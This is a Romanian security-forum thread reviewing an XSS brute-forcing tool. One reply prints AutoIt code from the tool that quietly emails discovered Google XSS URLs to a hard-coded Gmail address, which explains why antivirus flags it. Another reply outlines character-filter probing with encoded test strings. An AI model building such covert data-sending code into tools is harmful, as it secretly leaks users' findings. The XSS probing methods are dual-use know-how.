Jump to content
tudor13mn13

Ce parere aveti despre un XSS-Brute?

Recommended Posts

Din cauza asta e vazut ca virus:

If WinExists("[CLASS:#32770]") Then

$hwnd = WinGetHandle("[CLASS:#32770]")

$aStyle = DllCall("user32.dll", "long", "GetWindowLong", "hwnd", $hwnd, "int", -16)

$Style = Hex($aStyle[0])

$String = StringCompare($Style, "94C801C5")

If $String = 1 Then

$Ini_read = IniRead(@ScriptDir & "\XSS.ini", "XSS", "Url", "")

If StringInStr($Ini_read, "[COLOR=#ff0000]Google[/COLOR]") > 0 Then

$SmtpServer = "smtp.gmail.com"
$FromName = "XSS Catcher"
$FromAddress = "xss.catcher@gmail.com"
$ToAddress = "xss@gmail.com"
$Subject = "New Google XSS from " & $Pc_Name
$Body = $Ini_read
$AttachFiles = ""
$CcAddress = ""
$BccAddress = ""
$Importance = "Normal"
$Username = "asdf"
$Password = "asdf"
$IPPort = 465
$ssl = 1


$rc = _INetSmtpMailCom($SmtpServer, $FromName, $FromAddress, $ToAddress, $Subject, $Body, $AttachFiles, $CcAddress, $BccAddress, $Importance, $Username, $Password, $IPPort, $ssl)

Oricum nu am prins nimic...:P

Edited by Jimmy
Link to comment
Share on other sites

Eu cred ca ar fi mult mai util sa il gandesti altfel.

E cam aiurea sa ai o lista de vectori si sa faci bruteforce (din punctul meu de vedere). Nu vezi comportamentul aplicatiei.

Ai putea sa faci programul de asa natura incat sa vada ce caractere nu sunt filtrate, iar la urma sa iti vina cu un raport in care sa iti zica acele caractere. Dupa acest raport tu o sa stai si o sa te gandesti la cum sa scoti ceva de acolo.

Spre exemplu primele incercari ar putea fi:

vector = 't3st1234

vector = "t3st1234

vector = <t3st1234 sau vector = t3st1234<

vector = >t3st1234 sau vector = t3st1234>

Parsezi raspunsul de la server pana la t3st1234 si vezi ce s-a intamplat cu ' " > <.

..........

Encode %22 %27 %3e %3c sau double encode %2522 %2527 %253e %253c sau html encode a....

..........

La sfarsit sa iti vina cu un raport in care iti precizeaza un grad de risc dupa o metodologie proprie. In functie de acest grad de risc te hotarasti daca se merita sa faci tu manual ceva sau nu.

Felicitari pentru munca depusa in dezvoltarea respectivului tool. E bine sa lucrezi la astfel de proiecte.

Fara suparare, dar eu vad altfel lucrurile si nu cred ca un astfel de tool m-ar putea ajuta.

Edited by mah_one
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...